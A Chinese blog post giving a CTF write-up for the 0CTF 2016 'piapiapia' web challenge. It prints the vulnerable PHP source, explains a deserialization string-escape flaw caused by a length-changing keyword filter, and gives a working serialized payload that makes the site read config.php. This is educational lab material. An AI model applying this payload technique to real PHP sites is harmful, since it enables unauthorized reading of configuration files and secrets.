[0CTF 2016]piapiapia BUUCTF 详细writeup

最新推荐文章于 2024-04-19 09:03:25 发布
最新推荐文章于 2024-04-19 09:03:25 发布
阅读量467 收藏 2
点赞数
分类专栏: ctf 文章标签: php web python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38850916/article/details/120729220
版权

基础知识

php反序列话逃逸原理

解题思路

payload

/www.zip

源码泄露,直接可以下载

config.php

​​

打开config.php可以看到可能flag就存放在这里

访问/register.php,随便注册一个账号,然后登陆,发现跳转到了update.php

​​

update.php

//update.php
<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile .php">Your Profile</a>';
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Please Update Your Profile</h3>
			<label>Phone:</label>
			<input type="text" name="phone" style="height:30px"class="span3"/>
			<label>Email:</label>
			<input type="text" name="email" style="height:30px"class="span3"/>
			<label>Nickname:</label>
			<input type="text" name="nickname" style="height:30px" class="span3">
			<label for="file">Photo:</label>
			<input type="file" name="photo" style="height:30px"class="span3"/>
			<button type="submit" class="btn btn-primary">UPDATE</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

可以看到update.php页面对通过POST传入的phone、emil、nicknam、photo等参数进行了过滤,其中手机号和邮箱都要符合正常的格式,nickname的取值只能在a-zA-Z0-9和_当中并且长度不能大于10,这里只要post数据的时候把数据放到数组里面就可以绕过了

符合过滤条件的几个参数传入后放到了$profile[]里面,然后把$profile序列化后传入了update_profile()函数里面,函数代码如下,在函数里面对username和传入的序列化后的$profile进行了filter()过滤

update_profile()

//class.php
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

fileter()

//class.php
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

可以看到filter把传入的违规关键字'select', 'insert', 'update', 'delete', 'where'都替换为了hacker,可以很容易的发现hacker的长度为6,违规关键字中只有where的长度为5,其他的长度都和hacker一样,也就是说除了where关键字,其他关键字在替换之后长度都不会发生改变。这里就可以利用我们上面基础知识所提到的php反序列化字符逃逸漏洞漏洞了

我们只要在nickname参数中输入合理数量的where,在序列化之后再经过filter()过滤之后就可以让原本photo的内容溢出逃逸,变成我们构造的payload内容(config.php)

根据网站的大概逻辑写一个小demo用来测试

demo

//test.html
<html>
<head></head>
<body></body>
<form action="test.php" method="post" enctype="multipart/form-data" class="well"> 
    <h3>Please Update Your Profile</h3>
    <label>Phone:</label>
    <input type="text" name="phone" style="height:30px"class="span3"/>
    <label>Email:</label>
    <input type="text" name="email" style="height:30px"class="span3"/>
    <label>Nickname:</label>
    <input type="text" name="nickname" style="height:30px" class="span3">
    <label for="file">Photo:</label>
    <input type="file" name="photo" style="height:30px"class="span3"/>
    <button type="submit" class="btn btn-primary">UPDATE</button>
</form>
</html>
//test.php
<?php
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');

if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
    die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
function filter($string) 
{
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}
#print_r($profile);
echo '<br>';
echo '<br>';
$test1 = serialize($profile);
$test1 = filter($test1);
echo $test1;
$test = unserialize($test1);
echo '<br>';
echo '<br>';
print_r($test);
echo '<br>';
echo '<br>';
print_r($test['phone']);
echo '<br>';
echo '<br>';
print_r($test['email']);
echo '<br>';
echo '<br>';
print_r($test['nickname']);
echo '<br>';
echo '<br>';
print_r($test['photo']);
echo '<br>';
echo '<br>';

?>

然后我们在demo里面先正常传入一下数据看一下序列化后输出出来的结果

下面我们抓包修改一下nickname的名字,将";}s:5:"photo";s:10:"config.php";}拼接到nickname的内容中,此处的原因是上面可以看到flag就存在config.php中

修改前

修改后

 

可以看到后拼接上的字符长度和原来五个1的长度加起来一共是39,此时还知道每在nickname的内容中写一个where,后端就会把where替换成hack从而长度5变成6,下面就列出方程,设where的个数是x,那么如果想让后面的内容逃逸就应该满足39+5x=6x+5

可得x为34,也就是要添加34个where在nickname的内容中,下面进行实验

可以看到photo成功被替换成了config.php

下面发一下拼接后的payload

a:4:{s:5:"phone";s:11:"15103114513";s:5:"email";s:16:"165789634@qq.com";s:8:"nickname";a:1:{i:0;s:209:"11111hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/0412c29576c708cf0155e8de242169b1";}

 最后一部分的内容因为序列化的原理就成功逃逸了,下面我们去靶场试一下

";}s:5:"photo";s:39:"upload/0412c29576c708cf0155e8de242169b1";}

 BUU靶场实操

输入基本信息

 抓包

修改nickname拼接payload

解码

 解题成功

Le叶a子f
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次CTF过程(Writeup
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1256
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
CTF新生赛之Writeup
shikaku_的博客
11-27 4174
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故写下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要写这个,我就写了签到题哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道题,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
CTF 竞赛Writeup
最新发布
qq_63613566的博客
04-19 400
熟练应用AAPR软件,快速辨别加解密类型,仔细阅读题目。熟练应用Wireshark软件,仔细阅读题目。熟练应用Winhex软件,仔细阅读题目。2. 追踪TCP流,即可找到FTP密码。1.使用Wireshark打开所给的。熟练应用AAPR软件,仔细阅读题目。文件,找到request:PASS。熟练应用HxD软件,仔细阅读题目。3.打开压缩文件,得到flag。提示2:找到FTP密码即可。密码:cdts3500。
网络安全实验室CTF—脚本关 writeup
Senimo
08-02 3353
网络安全实验室CTF—脚本关 writeupkey又又找不到了快速口算这个题目是空的怎么就是不弹出key呢?逗比验证码第一期逗比验证码第二期逗比验证码第三期(SESSION)微笑一下就能过关了逗比的手机验证码激情燃烧的岁月验证码识别XSS基础关XSS基础关2:简单绕过XSS基础关3:检测与构造Principle很重要的XSS 网络安全实验室CTF链接 key又又找不到了 快速口算 这个题目是空的 ...
BUUCTF Web】WriteUp详细
qq_62604985的博客
07-10 1853
buutctf web题目题解, 升大三的暑假自己刷来提高能力的,是自己边做边写,暑假期间只要没事情,每天都会写一些题目,最迟晚上更新
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
CTF竞赛题write up示例
m0_62916138的博客
06-30 513
通过得到的是hack.pcap流量包,放到wireshark中通过字符串搜索得到,password为Admin123!1.webshell(单位网站被黑客挂马,请您从流量中分析出webshell,进行回答)–黑客登录系统使用的密码是。首先用notepad++打开,首先ctr+a全选安装下图1,2,3将url解码。用notepad++打开,首先ctr+a全选安装下图1,2,3将url解码。2.日志分析分析–攻击流量,黑客往/tmp目录写入一个文件,文件名为。3.简单日志分析–黑客查看的秘密文件的绝对路径是。
2023第五届 Real World CTF 体验赛 Writeup(web)
一只爱吃橙子的羊
01-12 2526
2023第五届 Real World CTF 体验赛 Writeup(web)
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3130
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
BUUCTF笔记之Web系列部分WriteUp(一)
克格莫
04-29 916
1、[极客大挑战 2019]EasySQL
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7559
BUUCTF题目Misc部分wp(持续更新)
BUUCTF笔记之Misc系列部分WriteUp(一)
克格莫
05-24 2386
话说misc系列可以说是调剂放松了,web和crypto做吐了,就来做点简单的misc放松一下。 1.N种方法解决 乍一看以为真是个exe,我还拖进IDA看了一波,结果还是吃了没见识的亏,后来IDA无果,拖进winhex看发现是一个图片文件。。。 重命名为jpg打开无果,发现文件头后面有个base64,看看文件末尾有等于号,那把中间这一大坨拿出来解码试试: 解码出来提示是png了,那把它解码之后的数据转成图片: 扫码得到flag。 ...
[0CTF 2016]piapiapia(字符逃逸详解)
记录学习,一起进步
02-01 848
[0CTF 2016]piapiapia
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
CTF日常训练WriteUpCTF秀靶场
2401_84150557的博客
04-11 950
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。(3)找到发现是栅栏密码。
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
Write up是指CTF题目的解题步骤和过程的详细记录,能够帮助其他参与者更好地理解和学习CTF题目的解题方法。本文档中提供了多个题目的write up,包括She、babyflash、otaku等多个题目。 **She题目解析** She题目是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值